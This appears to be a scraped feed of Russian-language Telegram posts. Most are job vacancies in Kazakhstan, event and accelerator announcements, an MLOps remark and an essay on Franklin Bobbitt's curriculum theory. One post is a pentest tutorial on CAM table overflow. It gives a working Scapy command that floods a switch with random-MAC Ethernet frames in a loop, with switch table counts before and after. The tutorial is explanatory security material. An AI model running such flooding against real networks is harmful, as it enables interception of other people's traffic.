Хороший силлабус стажировки backend от пользователя @shadowsmind

Использование атаки CAM Table Overflow в пентесте

Атака CAM Table Overflow
Иног­да такая ата­ка называ­ется перепол­нени­ем таб­лицы MAC-адре­сов. Прин­цип этой ата­ки сос­тоит в том, что­бы выз­вать перепол­нение ком­мутаци­онной мат­рицы. В слу­чае чего ком­мутатор, гру­бо говоря, прев­раща­ется в хаб и начина­ет рас­сылать пос­тупа­ющие кад­ры во все пор­ты, что вызыва­ет иде­аль­ные усло­вия для перех­вата тра­фика.

Вызывать перепол­нение очень прос­то, ведь у ком­мутато­ров огра­ничен раз­мер таб­лиц MAC-адре­сов. При запол­нении таб­лицы MAC-адре­сов зло­умыш­ленник смо­жет видеть все рас­сыла­емые кад­ры из всех пор­тов.

CAM Table Overflow
Вос­поль­зуем­ся Scapy, что­бы про­вес­ти такую ата­ку. В качес­тве MAC-адре­са источни­ка пусть будет ран­домизи­рован­ный MAC-адрес, каж­дый новый генери­рующий­ся кадр будет с новым MAC-адре­сом. MAC-адре­сов наз­начения это тоже каса­ется.

Да­лее с помощью метода sendp выпол­няем рас­сылку фик­тивных кад­ров Ethernet. Задав loop = 1, зацик­лим отправ­ку этих кад­ров.


>>> malicious_frames = Ether(src=RandMAC(), dst=RandMAC())
>>> sendp(malicious_frames, iface="eth0", loop=1, verbose=1)

Дамп тра­фика в момент про­веде­ния ата­ки
Таб­лица MAC-адре­сов ком­мутато­ра до ата­ки:

CoreSW#show mac address-table count

Mac Entries for Vlan 1:
---------------------------
Dynamic Address Count : 3
Static Address Count : 0
Total Mac Addresses : 3

Total Mac Address Space Available: 7981
Таб­лица MAC-адре­сов ком­мутато­ра пос­ле ата­ки:

CoreSW#show mac address-table count

Mac Entries for Vlan 1:
---------------------------
Dynamic Address Count : 7981
Static Address Count : 0
Total Mac Addresses : 7981

Total Mac Address Space Available: 7981

По­ка таб­лица MAC-адре­сов не запол­нена, ком­мутатор будет переда­вать все кад­ры из всех пор­тов, исполь­зуя широко­веща­тель­ную рас­сылку.

Статья

@linuxkalii

Минфин Израиля потребовал от премьер-министра страны немедленно созвать специальное заседание по вопросу переноса компании «Яндекс» в Израиль. Власти также собираются предоставить всем российским специалистам работающим в компании, проездной пятилетний документ - «лессе-пассе».

Таким образом, Яндекс полностью релоцируется в Израиле. @bankrollo

Если вдруг кто-то хочет посетить ММК и попасть на конференцию одного из крупнейших RPA центров компетенции.

https://rpanext.ru/conference/

ОБЪЯВЛЕНЫ ПОБЕДИТЕЛИ КОНКУРСА «BPM-ПРОЕКТ ГОДА’2022»

25.05.2022 на итоговой конференции конкурса «BPM-проект года’2022», были объявлены победители и призеры.

- Главный приз конкурса, а также приз Роскачества и приз ИТ-кластера Сколково получил проект ВТБ Онлайн «Упрощенный налоговый вычет без документов»

Призеры конкурса

- Приз за самый результативный проект — «Кормовит», «Увеличение прибыли в три раза за счёт изменения бизнес-процессов продаж и закупок»
- Приз за самый инновационный проект — «Маркетплейс трэйдинг», «Sello — маркетплейс для всех»
- Приз за лучший проект BPM среди государственных организаций — АНО «Служба обеспечения деятельности финансового уполномоченного», «Единая сервисная экосистема работы с обращениями»
- Специальный приз жюри за элегантное решение масштабной управленческой задачи — Комос групп, «Комплексный проект по созданию и внедрению Общих центров обслуживания»
- Приз сообщества ABPMP Russia — X5 GROUP, «Создание общего центра обслуживания HR»

Лауреаты конкурса

- ОАО «РЖД», «Фабрика роботизации бизнес-процессов»
- Государственная инспекция по контролю за использованием объектов недвижимости города Москвы, «Система категоризации рисков на основе объективных источников получения данных о принципах нарушений»
- Автохолдинг Максимум, «Управление обратной связью с потребителями»

Поздравляем победителей и призеров!

Фото/видео отчет об итоговой конференции готовится, оставайтесь на связи!

https://bpmaward.ru/schedule-2022/

💥 Друзья!

Astana Hub продолжает прием заявок на акселерационную программу Silkway Accelerator который проводится в партнерстве с Google for Startups.

В программе могут принять участие стартап-компании на стадии Product/market fit из стран Центральной Азии, а также Азербайджана и Монголии.

В рамках Silkway Accelerator, Вы на бесплатной основе получите:

🔹 Доступ к уникальным воркшопам от экспертов Google for Startups и Astana Hub;
🔹 Индивидуальное менторство от специалистов Google for Startups и Astana
🔹 Возможность получения финансирования на сумму до $55,000;
🔹 Апартаменты для проживания в г. Нур-Султан;
🔹 Networking с Google for Startups комьюнити;

🪐 Запуск Silkway Accelerator состоится 20 июня. По результатам отбора 15 лучших проектов на бесплатной основе смогут участвовать в акселерации, которая будет проходить в офлайн-формате в г. Нур-Султан и продлится 3 месяца.

❗️Если хочешь прокачать свой стартап успей зарегистрироваться до 5 июня. Более подробную информацию можно получить по ссылке.

Сегодня в курилке на скамеечке возле физмат школы обсуждали с гуру DevOps культуры @nurbeksadykov CEO qCloudy.io что в data science модели - не самая большая часть ML проектов. На самом деле они являются самой маленькой частью (но самой важной частью по функциям). Нет ничего, что подчеркивало бы это, как изображение ниже.

Вкратце, процессы MLOps это:
- Обработка данных: сбор, labeling, предварительная обработка
- Моделирование процессов, обучение, оценка, тестирование
- Вывод в прод - мониторинг и обслуживание моделей, потому что с течением времени модели деградируют.
Нурбек было начал про построение мат. моделей, но думаю это заслуживает отдельного митапа.

Завтрашний митап ОНЛАЙН

В Компьютерную Академию Шаг требуется на удаленный режим работы с 19:00-22:00 (*время Астана Казахстан) 4 дня в неделю (пн-чт) Преподаватель по дисциплине React Angular. Оплата 10-15$ за 1 пару (1,5ч)

#вакансия #parttime
В Компьютерную Академию Шаг требуется на удаленный режим работы с 19:00-22:00 3 часа в день (*время Астана Казахстан), 3 дня в неделю Преподаватель языка программирования Python Django. Оплата 10-15$ за 1 пару (1,5ч).

#вакансия #parttime
В Компьютерную Академию Шаг требуется на удаленный режим работы отдельно: с 15:00-18:00 и с 19:00-22:00 (*время Астана Казахстан) 4 дня в неделю Преподаватель языка программирования С# Asp.net. Оплата 10-15$ за 1 пару (1,5ч) Писать @Ninetieskid

Здравствуйте
Для марктплейса доставки цветов Cvety.kz ищем:
- it project manager 500к
- Тим лид разработчик 1500к
- бакенд и фронт енд разработчик 1000к @alekenov

Здравствуй! Если ты разбираешься во Front-End и Back-End, то читай вакансию, мы таких и ищем!

Компания OneDev ищет мощного специалиста в свои ряды. К хорошим сотрудникам мы относимся соответствующе, оплатой не обижаем, карьерный рост гарантируем.
Теперь к делу. Обратите на это внимание, пожалуйста! Если вы хороший Frond-End специалист, но Back-End у вас хромает, то вы нам не подходите. И наоборот. Мы ищем FullStack разработчика.

Обязанности:
Разработка сайтов, проектов и очень интересных проектов =)

Требования:
Опыт работы от 1-2 лет.
Свободное знание технологий, необходимы для реализации задач. HTML, CSS, JS (фреймворки JS плюсом), Json, Bootstrap, PHP, Python.
Опыт работы с CMS: Tilda, Wordpress, Bitrix, Shopify и другие.
Наличие портфолио, опыта работы с проектами.
Умение планировать работы над проектом. Вести таски в trello (или любой таск менеджер на выбор). Строить карту проекта. Расставлять сроки.

Условия:
Гибридный график: как удаленка, так и офис.
Оклад + бонусы + квартальные премии.
Интересные проекты в крупных компаниях (Mega, Бионорика, ESV, MedExpert и многие другие).
Карьерный рост до руководителя команды.

Писать в личку @avekon

А вот и долгожданная запись эфира о дизайнерах на Кипре🔥

Таймкод:
2:00 — Представление Юлии
3:40 — Представление Сергея и описание его команды
7:00 — Как дизайнеру из России получить оффер на Кипре
11:00 — Насколько возможно работать в зарубежной компании без знания английского и других языков
19:00 — Как понять, нужно ли вообще переезжать
21:00 — Причины жить и работать на Кипре
25:00 — Какие индустрии популярны на Кипре, в чем специфика компаний
30:40 — К чему нужно готовиться дизайнеру после принятия оффера, что будет после переезда
35:40 — Уровень жизни на Кипре
39:00 — Сложности жизни на острове
43:00 — Что пригодится дизайнеру из скиллов, чтобы быть актуальным
51:00 — Как на Кипре работать на фрилансе
53:00 — Какие шансы в релокации у джуниор специалистов
58:30 — Где найти помощь от русских, когда переехал на Кипр

#vacancy #вакансия #rust #remote #backend
Компания Swift Invention ищет разработчиков:
https://www.swiftinvention.com/#/

Full-time
Remote (Europe, Georgia, Armenia, Turkey, Kazakhstan, Poland)

Software Engineer (Rust)

Required skills:

5+ years of work experience in developing
Knowledge of cryptography and security best practices
Designing and implementing REST or gRPC APIs
Experience with relational databases (SQLite/MySQL/PostgresSQL)
Bachelor’s degree or higher in computer science or a related field

Desired Skills & Experience:

Experience in building Distributed systems
Experience in building Decentralized application
Experience with Linux, Docker and Kubernetes

About the project:

Mee https://mee.foundation/ is a software and legal framework to support human-centered apps that improve the quality of online life by giving people more control over their personal data.

Подробнее о вакансии https://www.swiftinvention.com/#/careers/rust

Contacts: [email protected]
tg @HelenSwiftInv

Ребят, привет

сегодня знакомые проводят созвон по анализу данных. Будут решать задачу из прошлых лет ШАДа.

Вы узнаете необходимую теорию, полезные материалы, где учить машинное обучение.
Можно будет задать дополнительные вопросы. Самые активные участники получат задачи по алгоритмам прошлых лет с решениями.

Будем рады встрече на канале @eda_shad.
Еще там можно найти созвон про получение оффера в Амазон и созвон с рекрутером Google

Live stream начинается через 5 минут: https://www.youtube.com/watch?v=gJRmoxBW9Ug

С единомышленником создали чат для профессионалов и пользователей Google Cloud platform. Кому интересна эта тема гоу: https://t.iss.one/gcp_kz

Меня всегда немного напрягал культ идеи образовательных результатов в проектировании. Кажется, что современный мир требует гибкости и самих программ, и понимания целей, с которыми проводится обучение. На мой взгляд, проектирование от результатов не гарантирует качества программы, особенно, когда результаты придумываются методистом без возможности проведения глубокого анализа. Для долгосрочных программ порой среда может поменяться в процессе обучения, а привязка к заложенным на старте результатам не позволит быстро перестраивать программу. Я вижу много противоречий в традиционных подходах к проектированию обучения в отношении к цифровой среде и неопределенности сегодняшнего дня.

Оказалось, это не безосновательно. Намедни на занятиях в магистратуре узнала о человеке, во многом заложившим концептуальные основы того, как принято сейчас создавать образовательные программы: уже не только для школьников или некомпетентных рабочих, и не под задачи индустриализации. Конечно же, решила поделиться с вами.

❗️Когда будете читать, прошу вас держать в голове, что описываемые события происходили более ста лет назад: первая мировая война; огромная волна низкоквалифицированной иммиграции в США; бурная индустриализация производства; расовая сегрегация в Америке будет процветать еще несколько десятилетий, ведь рабство отменили всего полвека назад; детский труд легитимно используется на фабриках, заводах и фермах; детская психология еще даже не сформировалась как наука; идет первая волна феминизма, женщинам только начинают давать избирательные права в отдельных штатах, но еще не на уровне конституции.

Личность, о которой пойдет речь, — Франклин Боббит (1876-1956) — американский педагог, профессор, писатель.

🔺Первая его работа по теории учебных программ была опубликована в 1918 году. В то время в промышленности укоренирась система менеджмента Ф. Тэйлора (тейлоризм, «научная организация труда»), которой свойственна жесткая иерархия, разделение труда, планирование и инструктаж, оценка эффективности. Заимствовав идею о детальном анализе трудовых операций, Боббитт разработал теорию социальной эффективности (theory of social efficiency), по которой разработка, реализация и оценка содержания образования рассматриваются как конвейерная линия по подготовке продукта = результата обучения = обученного ученика; и как механизм подготовки учащихся ко взрослым видам деятельности в индустриальном обществе. Боббит создал пять шагов для разработки учебной программы: анализ человеческого опыта, анализ работы, определение целей, выбор целей и детальное планирование.

🔺Еще в 1913 году Боббит писал:
«Школа сравнима с фабрикой. Ребенок — это сырье. Взрослый — это готовый продукт. Учитель — это фабричный рабочий. Учебная программа — это любая обработка исходного материала [ребенка], необходимая для превращения его в готовый продукт [желаемого взрослого]. Разработчик учебной программы является сотрудником исследовательского отдела, который изучает, чего хочет потребительский рынок [общество] с точки зрения готового продукта, и находит наиболее эффективный способ производства этого готового продукта.» Под эффективностью здесь понимается максимальное достижение целей учебной программы с наименьшими затратами времени, денег и человеческих ресурсов.

🔺Боббитт описывает эти задачи в двух принципах составления учебных программ:
1. Для продукта [желаемого взрослого] должны быть определены конкретные качественные и количественные стандарты. Это относится к созданию конечных целей учебной программы, то, что мы привыкли называть «образовательными целями/результатами».
2. Материал [человек], на который воздействуют трудовые процессы [учитель], проходит ряд последовательных стадий на своем пути от исходного материала [ребенок] к конечному продукту [взрослый]. Для продукта на каждой из этих стадий должны быть определены конкретные качественные и количественные стандарты. Определяются пошаговые изменения в обучающихся, которых превращают из некомпетентных в компетентных — соответствуют ли учащиеся требованиям целей по мере прохождения учебной программы.

Продолжение

🔺Для Боббита учебная программа — это описание целей и результатов, которых обучающиеся должны достичь в следствие стандартизированных процедур. Боббит считал, что людей не следует учить тому, что они никогда не будут использовать. Образование, по мнению Боббита, было прежде всего подготовкой к взрослой жизни и будущим рабочим задачам, а не к детству или юности. Детство само по себе не имеет значения.Таким образом, обучение 6-летнего ребенка заключается в подготовке к обучению 7-летнего ребенка, обучение 7-летнего ребенка к обучению 8-летнего ребенка и так далее, пока не будет достигнута зрелость. Это привело к ранней дифференциации в образовании. Боббит также не был сторонником совместного обучения: по его мнению, у девочек было совсем другое будущее, чем у мальчиков, поэтому они не нуждались в одинаковом образовании.

🔺Боббит писал:
«Мы привыкли говорить, что образование — это социальный процесс. Это процесс рецивилизации каждого нового поколения. Нам говорят, что каждый индивид рождается на культурном уровне стотысячелетней давности. Он — всего лишь сгусток потенциальных возможностей. Он не приносит с собой никакой части нашей накопленной человеческой культуры. Буквально, он рождается дикарем. Образование — это процесс такой обусловленности его деятельности и опыта, что по мере взросления он превращается в нормального цивилизованного человека.
То, что верно для отдельного человека, верно и для всего нового поколения... Общество несет ответственность за то, чтобы так обусловить рост этого нового поколения, чтобы оно переняло и продемонстрировало в своем поведении высокую и сложную культурную деятельность, которую человек медленно изобретал, накапливал и приучал к себе в течение длительного периода человеческой истории. Выполнение обществом этой цивилизующей функции, которую мы называем образованием.»

Почитать подробнее про Боббита и его идеи можно здесь: https://www.sagepub.com/sites/default/files/upm-binaries/47670_ch_3.pdf

#вакансия #Senior #Middle

Ищем Senior и Middle Backend разработчиков

Город: Алматы
Вилка: от 500.000-1 500 000 KZT

Требования:
1. Уверенное владение (strong middle, senior) Golang, либо другим языком (PHP, Python, C) и желание перейти на Go.
2. Знание принципов SOLID и их практического применения.
3. Понимание Domain Driven Design.
4. Знание теории БД: CAP, ACID/BASE, а также SQL.
5. Опыт разработки Rest API.
6. Знание bash, git.
7. Аналитический склад ума, способность декомпозировать сложные задачи, находить оптимальные решения.

Будет плюсом:
1. Опыт работы с NoSQL решениями: Cassandra, ElasticSearch, MongoDB.
2. Опыт работы с gRPC, Apache Kafka.
3. Опыт конфигурирования Gitlab CI
4. Умение оптимизировать время сборки и размер Docker контейнеров.
5. Умение разобраться и отладить конфиги развёртывания для kubernetes.

Контакты: @Aikaaam

#jobs
#вакансия
Город: Алматы
Должность: Системный аналитик
Компания: Centerhome
ЗП: от 500 000 KZT

Опыт работы на позиции СА от 2-х лет

Вам предстоит:
• выявлять и анализировать потребности заказчика;
• оформлять концепции в техническое задание с конкретными требованиями к будущему функционалу;
• подготавливать документацию по описанию сущностей, взаимосвязей и процессов предметной области с использованием специальных нотаций;
• тестировать разработку.

Мы ожидаем, что Вы имеете:
• опыт работы с банковскими бизнес процессами;
• навыки в аналитике платформенных вендорских решений;
• опыт интеграции с системами банка;
• опыт в написании SQL-запросов.
• опыт в работе с Postman, Swagger

Будет плюсом, если:
• умеете моделировать бизнес-процессы в нотациях BPMN, UML, Data flow


Что мы предлагаем:
• большой портфель проектов, в которых вы сможете себя реализовать как специалист;
• есть возможность гибридной работы (офис + удаленно)

Контакты:
@Aikaaam